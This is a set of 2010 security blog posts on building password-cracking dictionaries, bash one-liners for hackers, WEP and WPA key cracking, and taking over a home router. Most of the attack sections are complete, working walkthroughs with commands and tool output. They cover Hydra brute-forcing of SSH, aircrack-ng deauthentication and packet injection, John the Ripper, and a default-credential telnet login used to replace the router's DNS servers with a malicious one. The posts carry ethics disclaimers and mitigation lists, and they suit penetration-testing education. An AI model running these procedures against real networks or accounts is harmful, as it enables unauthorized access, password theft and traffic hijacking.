Saturday, 31 July 2010

Creating effective dictionaries for password attacks

There are various tools that can be used to attack online systems or offline password hashes, but having an effective dictionary, will often make the difference between success and failure.

Here we discuss some of the critical factors in creating password dictionaries, and use various methods to create some examples.

Please create good Karma by using these techniques for good reasons; To protect rather than attack, and to show people the risks, and how and why to choose better passwords.

There can be big differences in the approach for online or offline attacks, but basically we are trying to obtain or create a dictionary that contains the password. The dictionary needs to be big enough to contain the password, but small enough to be processed in a reasonable time-frame.

Offline hash cracking

If you have obtained some password hashes, you have all the time in the world to attack them offline, that is, until the passwords change of course.

Having a good dictionary which contains the password could save a large amount of time, making it unnecessary to use a brute force attack (by trying every possible combination)

Due to the offline nature of hash cracking, very large dictionaries can be used, and will prove to be effective in many cases, as users generally choose poor passwords.

Online attacks

Online attacks can be much more difficult, as sending thousands of attempts against an online system can be very time-consuming.

In addition, many online systems and protocols have protection mechanisms builtin. These mechanisms limit the amount of attempts, per IP, or in a given session or time-frame, to protect the system from brute force attacks. If the system is properly configured by the administrator, failed attempts will be logged, and attacks can be reviewed. Some systems can automatically disable usernames that are being attacked - and though this can lead to potential DoS attacks by attackers locking-out users, it does offer great protection against unauthorized access.

In online attacks, large dictionaries and brute force attacks are generally impractical.
The key to success is developing or choosing a relatively small dictionary, that is still likely to contain the password.


For online attacks you are most likely going to need a list of usernames as well as passwords. It is important that this list is focused (no point in attacking usernames that don't exist) so mostly these usernames would be based on a list of common names (such as root, admin, Administrator etc) or gained from previous reconnaissance.

Simple tests

Once you have your username list, online attack tools such as Hydra can be used to provide basic tests (such as using a blank password, or a password the same as the username) before using more exhaustive tests. These quick tests sometimes yield results so well worth trying first. Here is an example using SSH:

hydra ssh2 -s 22 -L users.txt -p password -e -ns -t 10

-L is the user list
-p is a password to try
-e and -ns denote trying an empty or "same as username" password

Even just these basic tests can produce some level of success. Surprising? Also, because of the small number of combinations the test is very fast.

Then more exhaustive attacks can be performed using word-lists. For example:

hydra ssh2 -s 22 -L users.txt -P wordlist.txt -t 10

So where do you get the wordlist from?

There is already a substantional password dictionary already inbuilt into Backtrack. You can find this in the following directory


This is a list of 1.5 million potential passwords, all uppercase (I guess with a view to enumerating LM hashes) but you can quickly turn this into the lowercase equivalent and/or combine the two as follows:

cat /pentest/windows-binaries/misc/wordlist.txt | tr [:upper:] [:lower:] > lowercase.txt
cat upper.txt lower.txt | sort > combined.txt

This doesn't give mixed case of course, but can potentially double your chances if you are cracking NTLM hashes, i.e. it gives you 3 million to try.

Note: This will be way too big for online attacks, and you will likely need something more focused in those cases.

Online dictionary downloads
There are many dictionaries available online, such as the milworm dictionary, which is a downloadable file containing passwords, from years worth of submissions to an online hash-cracker used by Hackers and Pentesters. This dictionary has many of the most common passwords contained in it's 83,000+ entries.

The Milw0rm website is no-longer online, but an example Google search should find something:


Is your password in this dictionary? Take a look.
Are you thinking about changing your password right now?

Google is such a helpful chap. Try searching Google with something like:

dictionary filetype:txt

See what you can find, there are lots of languages and resources to choose from, but they may need to be trimmed, edited, joined etc

Creating your own dictionaries

As I showed in one of my previous blogs, it is possible to take a text file and turn it into a dictionary. Here is an example to create a simple word-list dictionary from a text file:

cat sourcefile.txt | tr  [:punct:] " " | xargs -n 1 -P0 echo >> wordlist.txt
sort -u wordlist.txt > dict.txt

This expression takes the source-file, removes the punctuation, processes the words one per line into a file, and sorts the words to remove duplicates.

You may need quite a big file to create a reasonable dictionary. For an example, I chose one of my blog entries, which was 6K, and ended up with 413 words, including capitalization. We can remove capitalization and count what we have left with the following:

cat dict.txt | tr [:upper:] [:lower:] | sort -u | wc -l

Only 386 unique words out of 2,282 - maybe I need to improve my vocabulary ;o) ?
Anyway, the point is that we can chose the files, thus targeting our dictionary based on the content of the files. For example, if you were pentesting a company, you could gather some of their online literature, and use that as a source for your dictionary.

Sequences can easily be created

Taking the example above, we can add some numbers on the end of each word (something users often do to avoid password policies on reuse and expiry)

for word in $( cat dict.txt ); do for num in $( seq 1 13 ); do echo $word$num ; done ; done > dictplusnum.txt

Which adds numbers 1 to 13 on the end of each word, producing a much larger dictionary, but one that may produce better results.

Nouns and Names

There are lots of resources online that can be used to create dictionaries.
One example I have used is using online census data. Take the US census data as an example:

Another advantage of using this type of resource, is that the names in a census are often sorted in popularity, so for example you can create a dictionary of the top 500 mail, female, and surnames with something like the following:


head -n 500 dist.* | cut -d" " -f1 | grep -v == | tr [:upper:] [:lower:] | sort -u > topnamesdict.txt

The expression takes the first 500 lines in each file, removes extra data, converts the content to lowercase, and sorts to remove duplicates.

In my test, this yields 1388 names (due to duplicates in the lists) Obviously you could use the whole files for a more exhaustive attack, or alternatively use these resources to create username lists.

Spidering websites

There are various tools for spidering websites and creating dictionaries from their content. One such tools is called cewl, which can be found here:

With some install corrections and troubleshooting, for Backtrack 4 users here:

Usage is of the form:

./cewl.rb -d 1 -v > bbc.txt

So, if you know a persons interest, be it celebrities or football, cars or gardening, you can find some sites related to this, spider them, and create a focused dictionary based on a users interest.

If you know the password policy, so much the better, as you can trim out words which don't meet the criteria to reduce the size of the list.

Using the password dictionary

A couple of quick examples in addition to Hydra (shown above):

With aircrack to crack a WPA pre-shared key, from an authentication handshake in a capture dump:

aircrack-ng -e mywifi -w wordlist.txt

With John the Ripper (jtr) to crack previously captured hashes:

./jtr --wordlist wordlist.txt hashes.txt


Any or all of the above (and more) could be combined to create either exhaustive, or finely tuned, dictionaries for use with various online and offline password attack tools. This can be used in combination with brute force attacks, but makes password attacks much more efficient, if the password is found in the dictionary.

Mitigations for these attacks include

  • Training users to choose better passwords, especially ones that are not likely to appear in a dictionary
  • Longer passwords (passphrases rather than passwords)
  • Discouraging password sequences; password1, password2, password3 etc
  • Implementing and enforcing stronger password policies
  • Implementing defenses such as password lockouts and expiring passwords

Friday, 30 July 2010

Bish Bash Bosh; Linux commandline Kung-fu for Hackers

In order to make the best use of various commandline tools, it is important to have a good understanding of bash commands and techniques. These techniques can save a massive amount of time and effort, and achieve results that would be impossible manually.

Commands such as cut, tr, wc, sort, grep, sed, xargs and awk are really useful, and it is important for any budding commandline ninja to learn how to use these effectively. Also, the pipe symbol "|" and redirection ">" and "<" can be used to direct input and output to chain commands together making the commandline an extremely powerful toolset.

On top of that there are various programming options, that are possible on the commandline, from "for" loops, to one-liners for various scripting languages including perl and python.
The more you know about the options you have, the more creative you can be.

Please remember to use these techinques only for good, not for malicious purposes.

Here are some expressions that I have found very useful:

Grep, pipe, cut and wc

Say you want to scan a subnet with nmap, and build a list of IPs that have TCP port 80 open, and count them.

nmap -oG http.txt -p T:80
grep -i open http.txt | cut -d" " -f2 > httpips.txt
wc -l httpips.txt

The first line uses nmap to scan a subnet, and create a file output in a grepable format.
The second line then greps this file, in order to find any lines containing "open", and for each line found, it extracts the ip address and writes that to a second file.
You then have a useful file containing the ip addresses of all the systems running a TCP service on port 80 (probably web-servers)
The third line counts the number of lines in the file created, i.e. the number of hosts with port 80 open.

Using echo and awk to create HTML tags

Following on from the above example, imagine you found many hosts, and wanted to wrap these IP addresses in html so that you could use a browser to click through and look at the Web homepage on each server. You could use awk to wrap each line in html tags, and echo to top and tail your html.

echo "" > httpips.html
cat httpips.txt | awk '{ print "" $1 "" }' >> httpips.html
echo "" >> httpips.html

Then you can open up httpips.html in a web browser and have a quick look through each site.

Note: I noticed my HTML tags got stripped out when I published the post, but never mind

Using cat, echo, tr, xargs, and sort to create a dictionary out of some documents,

I've been in a situation where I needed a dictionary (for a password attack) and had no internet access. There are various tools in Backtrack that have supporting documents, so I found some large ones by searching around, and then extracted a dictionary as follows.

cat sourcefile1.txt sourcefile2.txt sourcefile3.txt | tr  [:punct:] " " | xargs -n 1 -P0 echo >> wordlist.txt 
sort -u wordlist.txt > dict.txt

The first line lists the source files, then uses "tr" to turn all the punctuation into white space, before using xargs to echo each of the words found into a new file, one on each line. The second line sorts all the words found, removes duplicates, and puts the result in a dictionary file. This is pretty effective, and you could use a variety of source files to produce large dictionaries quite quickly.

Using sed to prepend, and append text

Say you have a text file and you want to add something to the begining and end of each line. You may have a situation where you want to copy a script to a remote server, inline in a command shell. The following expression enables you to use the "echo" command to write each line to a file.

sed 's/^/echo /' script.txt | sed 's/$/ >> script.bat/'

This expression processes each line of the file script.txt, adds "echo " at the begining, and " >> script.bat" at the end, and prints the result to the screen.
Cut and past the result of this into the shell, and you will end up with your original script as a file called script.bat on the remote system.

"For" loops on the commandline

So, you want to do something repetitive with a list of hosts; quicky and easily

Lets run nmap for each of 50 hosts in a range, and write grepable results out to a set of files named by IP address.

for ip in $(seq 150 200); do nmap -oG nmapscan192.168.1.$ip.txt 192.168.1.$ip & done

Seq is a good tool for doing operations with ranges in for loops. In other situations you may prefer to use something like "echo {150..200}". The rest of the for loop should be self explanitory, but note the "&", which enables these jobs to run concurrently. This can speed up time-consumming processes in some cases.

Chaining grep, cut and sort, and using "for" loops with a file

Say you want to do some quick analysis of some web logs, over several days of logs, and you want to find all the hosts requesting a specific URL, and sort them by unique IP address. You then want to ping the IP addresses to see how many of them respond.

First check the file format, using something like "head" on one of the files.

head /var/log/apache2/access.log

Then something like

cat /var/log/apache2/access*.log | grep "/myfile.html" | cut -d" " -f1 | sort -u > myhosts.txt
for ip in $( cat myhosts.txt ); do ping -c 1 $ip | grep "1 received" | sed "s/^/$ip is up - /" | sort -u ; done is up - 1 packets transmitted, 1 received, 0% packet loss, time 3ms is up - 1 packets transmitted, 1 received, 0% packet loss, time 1ms

As you can see, you can get pretty creative, and the long job of pouring over several log files, with thousands of log entries, and searching for IP addresses, is reduced to less than a minutes work.

Perl and Python oneliners on the commandline

Perl and Python oneliners can be issued on the commandline and included in the mix with other operations described previously. This is done easily with the -c option in Python.

python -c 'print "A" * 500' > buffer.txt

This example prints a buffer of 500 A's to a file using Python

Similar results can be obtained with the -e option in Perl.

If you are interested in expanding your options, with many more possibilites, then I would highly recommend the following site, which contains many examples, and users can rate expressions for usefulness.

Mitgating factors are not to relevant for this post, but bear in mind, that when you have a system you want to secure, one aspect of hardening; is to limit the tools and languages that would be available to a potential attacker. Have fun, and be good.

Wednesday, 21 July 2010

Wireless security: Clientless WEP cracking

WEP is weak, you know it's true, and here is another reason why.

Most of the techniques that attackers can use to break into WEP wireless networks, are based on sniffing traffic from clients. Information found is then used for amplification of traffic to/from clients in order to find enough packets, with weak Initialization Vectors (IVs) so that the WEP key can be guessed using statistical techniques.

Often clients may not be on the network at the time the attacker is trying to penetrate it, but penetration is still possible - even without active clients.

Here we look at the "Clientless WEP attack", which uses techniques to construct portions of the PRGA keystream, so that packets (of the attackers choice) can be injected into the network, and broadcast responses (with weak IVs) can be collected.

We are going to be using Backtrack 4 and the Aircrack-ng suite of command-line tools.

Please be good, and only try these techniques on your own test equipment. There is such a thing as the law you know, and breaking into someone else's Wireless router is against the law.

As we are posing as a sneaky attacker, we will change our MAC address before we bring the card up in monitor mode.

modprobe rt73
macchanger -r rausb0
macchanger -s rausb0 >> info.txt
airmon-ng start rausb0 7

First we have a quick look at our target WAP.

airodump-ng --encrypt wep -w macchangeclientless2 --channel 7 rausb0

 CH  7 ][ Elapsed: 0 s ][ 2010-07-21 13:04

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:2A:0C:7F  105 100       26       0    7   7  54e  WEP  WEP         SlowNet

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

We now have all the details we need for the attack:
  • Our attacking MAC address = 32:32:fe:16:ea:29
  • The victim WAP ESSID = SlowNet
  • The victim WAP BSSID = 00:90:D0:2A:0C:7F
  • The WAP is on channel 7
Then we need to fake-authenticate to the access point, to make sure our packets are accepted.

aireplay-ng -1 0 -e SlowNet -a 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 rausb0

 CH  7 ][ Elapsed: 20 s ][ 2010-07-21 13:04

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:2A:0C:7F  105 100       46       15    7   7  54e  WEP  WEP         SlowNet

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:90:D0:2A:0C:7F  32:32:FE:16:EA:29   -1    1 - 0      0        1

That's our wireles card "fake authenticated" to the WAP. Next we need to test injection using aireplay.

aireplay-ng -9 -b 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 rausb0
13:06:31  Trying broadcast probe requests...
13:06:32  No Answer...
13:06:32  Found 1 AP

13:06:32  Trying directed probe requests...
13:06:32  00:90:D0:2A:0C:7F - channel: 7 - 'SlowNet'
13:06:38   0/30:   0%

The card I am using here is not great, so I practically need to be in the same room, lets get closer...

aireplay-ng -9 -b 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 rausb0
13:06:59  Trying broadcast probe requests...
13:06:59  Injection is working!
13:07:01  Found 1 AP

13:07:01  Trying directed probe requests...
13:07:01  00:90:D0:2A:0C:7F - channel: 7 - 'SlowNet'
13:07:01  Ping (min/avg/max): 0.059ms/9.589ms/114.156ms Power: 108.59
13:07:01  29/30:  96%

That's better, and this is something to watch out for. You need to be close to the WAP, for the fragmentation attack to work, because you need a good percentage of your transmissions to be received by the WAP.

So now we can start a fragmentation attack to get some keystream data

aireplay-ng -5 -b 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 rausb0
13:08:37  Waiting for beacon frame (BSSID: 00:90:D0:2A:0C:7F) on channel 7
13:08:37  Waiting for a data packet...
Read 276 packets...

        Size: 68, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:90:D0:2A:0C:7F
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:0E:50:EC:B2:A6

        0x0000:  0862 0000 ffff ffff ffff 0090 d02a 0c7f  .b...........*.
        0x0010:  000e 50ec b2a6 b0cd 8e68 6200 7cb2 7315  ..P......hb.|.s.
        0x0020:  1d3a f884 9feb 9451 d96f 83c0 90fc fdf3  .:.....Q.o......
        0x0030:  bec5 a496 7b8a dc6c 74c1 17e6 8e56 9be1  ....{
        0x0040:  f966 d142                                .f.B

Use this packet ? y

Saving chosen packet in replay_src-0721-130905.cap
13:09:08  Data packet found!
13:09:08  Sending fragmented packet
13:09:08  Got RELAYED packet!!
13:09:08  Trying to get 384 bytes of a keystream
13:09:08  Got RELAYED packet!!
13:09:08  Trying to get 1500 bytes of a keystream
13:09:09  Got RELAYED packet!!
Saving keystream in fragment-0721-130908.xor

This gives us 1500 bytes of keystream data, which we can XOR with our packets to encrypt them for the wireless network.

We will make a broadcast ARP packet from the keystream data obtained

packetforge-ng -0 -a 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 -k -l -y
fragment-0721-130908.xor -w arp-request3
Wrote packet to: arp-request3

Lets see what it looks like

tcpdump -n -e -vvv -s0 -r arp-request3
reading from file arp-request3, link-type IEEE802_11 (802.11)
13:10:37.855810 WEP Encrypted 258us BSSID:00:90:d0:2a:0c:7f SA:32:32:fe:16:ea:29 DA:ff:ff:ff:ff:ff:ff Data IV:6268ad Pad 0 KeyID 0

Now we will inject many copies of our constructed packet onto the network so that we can collect the responses.

aireplay-ng -2 -r arp-request3 rausb0
No source MAC (-h) specified. Using the device MAC (32:32:FE:16:EA:29)

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:90:D0:2A:0C:7F
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  32:32:FE:16:EA:29

        0x0000:  0841 0201 0090 d02a 0c7f 3232 fe16 ea29  .A.....*.22...)
        0x0010:  ffff ffff ffff 8001 ad68 6200 c337 dd5b  .........hb..7.[
        0x0020:  8eb8 18ef 6c25 f5ba 4601 80a0 decd a9fe  ....l%..F.......
        0x0030:  c556 3a2d c853 3407 ad01 7288 e29e f251  .V:-.S4...r....Q
        0x0040:  2beb e700                                +...

Use this packet ? y

Saving chosen packet in replay_src-0721-131037.cap
You should also start airodump-ng to capture replies.

Looking at our dump screen we can see that the data packets are now rapidly expanding

 CH  7 ][ BAT: 1 hour 42 mins ][ Elapsed: 6 mins ][ 2010-07-21 13:12

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:2A:0C:7F  111  88     3744     5540  162   7  54e  WEP  WEP    OPN  SlowNet

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 (not associated)   00:14:A5:2B:49:FF  102    0 - 1      0       11

... so we can start aircrack-ng to crack the WEP key...

aircrack-ng macchangeclientless2-01.cap

                                                       Aircrack-ng 1.1 r1738

                                       [00:00:30] Tested 9 keys (got 14851 IVs)

   KB    depth   byte(vote)
    0    0/  1   AA(32512) 36(27648) 46(26880) 5C(26880) 6B(26624) BA(25856) 5F(24832) AB(24832) 39(24064)
    1    2/  4   08(27648) 65(26368) EF(26368) 3F(25856) 42(25088) C1(24832) 88(24064) DF(24064) EC(24064)
    2    0/  1   CC(30208) DD(28160) 4C(25856) 71(25344) 2A(25088) 37(25088) A3(25088) E6(24832) 73(24576)
    3    1/  2   DD(26624) B5(25344) 22(25088) CE(25088) E5(24576) 44(24320) 93(24320) 96(24320) 80(24064)
    4    0/  1   EE(27904) 6C(26112) 32(25344) 23(24832) 27(24576) 3F(24576) BE(24576) 1E(24320) 2D(24320)

                         KEY FOUND! [ AA:BB:CC:DD:EE ]
        Decrypted correctly: 100%

... and in 30 seconds, the WEP key is ours...
And thats a wrap...

To prevent these issues
  • Always use WPA or WPA2 for secure networks
  • Never use WEP except where you don't mind an access point being completely open
  • Choose a strong and long password

Saturday, 17 July 2010

Attacking secured clients via a insecure wireless router

Anyone who knows anything about IT Security knows that Wifi routers are vulnerable to attack.

This is especially true with the wireless routers in the average home because of the typically poor default security settings of equipment purchased for the home.

In addition fundamental flaws found in WEP, or WPA setups, combined with weak passwords, make wireless hacking relatively easy.

However, these days it is more common for PC vendors, to sell laptops and desktops with a reasonably good level of security out-of-the-box.

Typical new systems will have modern operating systems, such as OSX Snow Leopard, Windows7 or Ubuntu, with operating system updates enabled, a firewall correctly configured by default, and often evaluation or full-licence Anti-virus software installed with updates enabled.

Excellent, so people with new computers are safe then, aren't they?

No they are not. This is because homes have home-networks, and typical home users know nothing about network security. Also, because the level of security provided by the default configurations of many home broadband routers is still poor, even users with new and well configured PCs are at risk.

Let's take it as read, that there are many old systems out there with no Anti-virus, no firewall, no patch management and completely open wireless access points or WEP. Let's look at a more sophisticated Wireless and network attack against a home network, with a well configured client PC.

Please only test these techniques on your OWN equipment, or where you have express permission.

Hacking the wireless

Because I have discussed WEP hacking previously, we will look at hashcracking WPA.

If an average user chooses their own password, chances are that they will make a crap choice (because a crap password is easy to remember ;o)

So lets see how to crack a crap WPA password:
In Backtrack, start airmon on the correct channel dumping the captured traffic to a file

airodump-ng --channel 7 -w homewpa mon0

 CH  7 ][ Elapsed: 4 s ][ 2010-07-16 22:32

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:2A:0C:7F  -38   0       71       30    0   7  54e  WPA2 CCMP   PSK  SlowNet

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:90:D0:2A:0C:7F  00:22:FB:18:8B:02   -1   54e- 0      0       21

Now we can see there is a client, if we deauthenticate this client it should automatically try to reauthenticate and we will capture the password hash, which we can they try to crack.

aireplay-ng -0 1 -a 00:90:D0:2A:0C:7F -c 00:22:FB:18:8B:02 mon0
22:36:20  Waiting for beacon frame (BSSID: 00:90:D0:2A:0C:7F) on channel 7
22:36:20  Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [25|121 ACKs]

Now hopefully our victim client will try to reauthenticate. Give it a few seconds and then try aircrack.

Of course, you will need to have a dictionary file, that contains the password, but these are easy to create, and there are loads of dictionaries available to download which contain thousands of the most commonly used passwords. It's really easy.

aircrack-ng -w dict.txt homewpa-04.cap
Opening homewpa-04.cap
Read 10916 packets.

   #  BSSID              ESSID                     Encryption

   1  00:90:D0:2A:0C:7F  SlowNet                   WPA (1 handshake)

                                 Aircrack-ng 1.1 r1738

                   [00:00:00] 1 keys tested (39.69 k/s)

                           KEY FOUND! [ password2 ]

      Master Key     : 9A DA C7 AA F5 91 A3 0D 5E 65 51 E1 E9 75 C6 7D
                       12 E2 05 3E 8B 81 75 95 77 AB 07 E8 B4 E2 86 5F

      Transient Key  : EC 0A E9 FC 0A 52 21 4F E3 44 BE 9F 01 EA 7D 6E
                       AE B0 E4 1B C2 63 B8 19 95 87 C9 B0 42 FC E9 F5
                       D6 7C 97 06 F0 15 85 11 4E AE DF 8A F9 1D D4 BC
                       E6 E6 6A 58 5F 1C C7 EF CA BB BE 23 FC D5 2F A0

      EAPOL HMAC     : AA 2E D5 5D 52 7A DF 8B EF 01 0E D9 24 47 56 8A

This only took a few seconds and, Tada! One password, and we are as good as in.

However, on gaining access to the network, we discover that the only client there is secured.


Starting Nmap 5.30BETA1 ( ) at 2010-07-16 22:47 BST
Nmap scan report for mytarget.lan (
Host is up (0.000034s latency).
All 1000 scanned ports on mytarget.lan ( are closed

Nmap done: 253 IP addresses (1 host up) scanned in 5.97 seconds

Looks like the client target system has some kind of client-based firewall, and is well configured, so game over?

Err... Nope...

Other options at this stage include traffic sniffing and Man In The Middle attacks (MITM) such as ARP spoofing, but we are going to look at DNS substitution.

Hacking the network via the router

Once we are on the network, we are an insider, and the typical response for a home router is to give us an IP address if we ask for it with DHCP. We can then attack the router, and change its configuration to help us to attack the client PCs.

First lets have a look at the router with nmap:


Starting Nmap 5.30BETA1 ( ) at 2010-07-14 06:48 BST
Nmap scan report for dsldevice.lan (
Host is up (0.0080s latency).
Not shown: 995 filtered ports
21/tcp   open  ftp
23/tcp   open  telnet
80/tcp   open  http
443/tcp  open  https
1723/tcp open  pptp
MAC Address: 00:0E:50:EC:B2:A6 (Thomson Telecom Belgium)

Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds

So we have a Thomson Router, with a Web UI and telnet and FTP access.
Poking around with a web scanning tool (or looking at the web UI) confirms the model:

./ -host -port 80
- Nikto v2.1.1
+ Target IP:
+ Target Hostname:    dsldevice.lan
+ Target Port:        80
+ Start Time:         2010-07-15 05:56:03
+ Server: No banner retrieved
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server banner has changed from  to Speed Touch WebServer/1.0, this may suggest a WAF is in place
+ Default account found for '"ST585v6"' at /Orders/ (/Orders/order_log_v12.dat) (ID 'sysadmin', PW 'password'). Ricoh Aficio
+ 6414 items checked: 16 error(s) and 1 item(s) reported on remote host
+ End Time:           2010-07-15 06:04:29 (506 seconds)
+ 1 host(s) tested

And looking up in the manual for a ST585v6 online, we find the default username is "Administrator" with a blank password, and we can login to telnet with this:

Connected to
Escape character is '^]'.
Username : Administrator
Password :

                             ______  SpeedTouch 585
                        /         /\
                  _____/__       /  \
                _/       /\_____/___ \  Copyright (c) 1999-2007, THOMSON
               //       /  \       /\ \
       _______//_______/    \     / _\/______
      /      / \       \    /    / /        /\
   __/      /   \       \  /    / /        / _\__
  / /      /     \_______\/    / /        / /   /\
 /_/______/___________________/ /________/ /___/  \
 \ \      \    ___________    \ \        \ \   \  /
  \_\      \  /          /\    \ \        \ \___\/
     \      \/          /  \    \ \        \  /
      \_____/          /    \    \ \________\/
           /__________/      \    \  /
           \   _____  \      /_____\/
            \ /    /\  \    /___\/
             /____/  \  \  /
             \    \  /___\/


(even if the password had been changed, a quick blast with hydra on the telnet port, using a good dictionary, would likely find us our password)

All the help is still enabled in this configuration, so a few minutes poking around with that, and we can start attacking the network by removing the DNS server settings and adding ones of our own.

Introducing malicious DNS servers

Even some IT people underestimate the security importance of DNS; but basically, DNS provides hostname to IP address resolution. If we can control the DNS server that the clients use, we can use a malicious DNS server to control where the clients go, for web attacks, phishing, and more.

This can be done either by changing the DHCP configuration, or the forward lookup servers that the router uses for DNS.

Let's see how deep the rabbit hole goes:

{Administrator}[dns server route]=>:dns server route list

DNS Server Entries:
  DNS Server     Source              Metric  Intf     State  Domain
D                          10    Internet  UP      *
D                          10    Internet  UP      *

So, lets remove the default DNS servers, and add our own, i.e. the one running on our attacking system, or one we have previously set up on the web somewhere.

{Administrator}[dns server route]=>:dns server route flush
{Administrator}[dns server route]=>:dns server route add dns= metr
ic=10 intf=Internet
{Administrator}[dns server route]=>list

DNS Server Entries:
  DNS Server     Source              Metric  Intf     State  Domain
S                          10    Internet  UP      *

So we have substituted in our malicious DNS server, I'll leave the rest up to your imagination.

The mitigations for these threats are
  • Change the default password on the router to something long and strong
  • Enable WPA2 with PSK, and again, with a strong password
  • Choose a router that has anti-hacking functions, such as IDS or IPS
  • Know how to check your router's logs, and check them from time-to-time
  • Look out for odd clients you don't recognise on your network
Be good, and stay safe

Friday, 16 July 2010

Cracking WEP keys on wireless routers

Wireless routers are notoriously insecure if they are left with default settings.

Please only test these techniques on your OWN equipment, or where you have express permission, remember: You are the heir of your karma; Whatever karma you do, whether for good or for evil, You will be the heir.

That said; Lets examine how easy it is to crack the WEP key for a wireless network, using Backtrack 4, then we will look at how this threat can be mitigated.

Start our wifi card in monitor mode

airmon-ng start wlan0

In another window, identify the network we are after using airodump

airodump-ng  -w homewep mon0

 CH  2 ][ Elapsed: 48 s ][ 2010-07-16 21:06

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:2A:0C:7F  -34      113       21    0   7  54e  WEP  WEP    OPN  SlowNet
 00:24:17:AB:F3:53  -46        0        0    0   1  54   WPA2 CCMP   PSK  virgin broadband

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:90:D0:2A:0C:7F  00:22:3F:E9:89:FF    0    0 - 1      0       24  SlowNet
 00:90:D0:2A:0C:7F  00:25:57:8B:5D:68   -1    1e- 0      0        1
 00:90:D0:2A:0C:7F  00:22:FB:18:8B:02   -1   54e- 0      0        5

Then start airodump with the correct channel and bssid to narrow-in on our target network

airodump-ng -a --bssid 00:90:D0:2A:0C:7F --channel 7  -w homewep mon0

 CH  7 ][ Elapsed: 4 s ][ 2010-07-16 20:47

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:2A:0C:7F  -38 100       36      124   49   7  54e  WEP  WEP         SlowNet

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:90:D0:2A:0C:7F  00:22:FB:18:8B:02   -4   54e-48e   778      123

Leave that running, and in another window, use aireplay to hunt for packets of the right type to replay, to generate more initialization vectors (IVs)

aireplay-ng -2 -b 00:90:D0:2A:0C:7F -d ff:ff:ff:ff:ff:ff -t 1 mon0

Leave that running, and in yet another window, deauthenticate the victim client to generate some traffic

aireplay-ng -0 4 -a 00:90:D0:2A:0C:7F -c 00:22:FB:18:8B:02 mon0
20:49:28  Waiting for beacon frame (BSSID: 00:90:D0:2A:0C:7F) on channel 7
20:49:28  Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [98|130 ACKs]
20:49:29  Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [ 1|127 ACKs]
20:49:30  Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [ 0|127 ACKs]
20:49:30  Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [ 0|126 ACKs]

Now our aireplay gets going...

Read 460 packets...

        Size: 120, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:90:D0:2A:0C:7F
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:22:FB:18:8B:02

        0x0000:  8841 2c00 0090 d02a 0c7f 0022 fb18 8b02  .A,....*.."....
        0x0010:  ffff ffff ffff 9047 0000 a232 d600 30c5  .......G...2..0.
        0x0020:  c043 e98c 208d ac1f d640 9ba6 9666 650b  .C.. ....@...fe.
        0x0030:  5117 3b19 f2f8 fe54 0470 9441 a2ea f702  Q.;....T.p.A....
        0x0040:  e188 c597 cd64 2228 37ce 3117 63fb e44c  .....d"(7.1.c..L
        0x0050:  ed99 fe9a d67e 41e8 77f6 850c 4572 7519  .....~A.w...Eru.
        0x0060:  ba40 928b 1d47 7a6c 061c 160f a0ab c4cb  .@...Gzl........
        0x0070:  c43c e739 064d 2f60                      .<.9.M/`

Use this packet ? y

Saving chosen packet in replay_src-0716-204141.cap
You should also start airodump-ng to capture replies.

...and we can see our data packets increasing in the airodump window, so in yet another window, we can start aircrack, to crack the WEP key

aircrack-ng -z -n 64 homewep-01.cap

and before we know it, we have the keys to the network

                                                       Aircrack-ng 1.1 r1738

                                       [00:01:34] Tested 564707 keys (got 20026 IVs)

   KB    depth   byte(vote)
    0    5/ 25   AA(24832) 08(24576) 3C(24576) 2A(24320) 41(24320) 87(24320) 89(24064) DE(24064) A8(23808)
    1    1/ 14   BB(27136) B5(26368) C8(25856) FF(25088) 46(25088) B7(24320) EB(24064) 1A(24064) BC(23808)
    2    0/  7   CC(28928) 3F(27648) 45(26112) BA(25344) C2(25344) 03(25088) 0A(25088) 5F(24832) 8B(24320)
    3    1/ 32   DD(26368) FB(25856) 4D(25856) 69(25856) 5C(25344) 9C(25344) 36(25088) 5B(24832) 38(24576)
    4    5/  8   C6(24064) 57(23808) FC(23808) 85(23552) 9F(23552) D4(23552) E5(23552) F3(23552) 11(23296)

                         KEY FOUND! [ AA:BB:CC:DD:EE ]
StartingDecrypted correctly: 100%s.

End to end, that probably took around 10 minutes.

More info and other techniques are available at:

To eliminate this threat
  • Don't use WEP, use WPA2
  • If you are using WPA preshared keys (PSK), choose a long key, because WPA is susceptable to authentication hash sniffing, and brute-forcing the key (which is just as easy as cracking WEP if the PSK is short)
  • For more secure environments, use WPA2 and certificate-based authentication instead of PSK

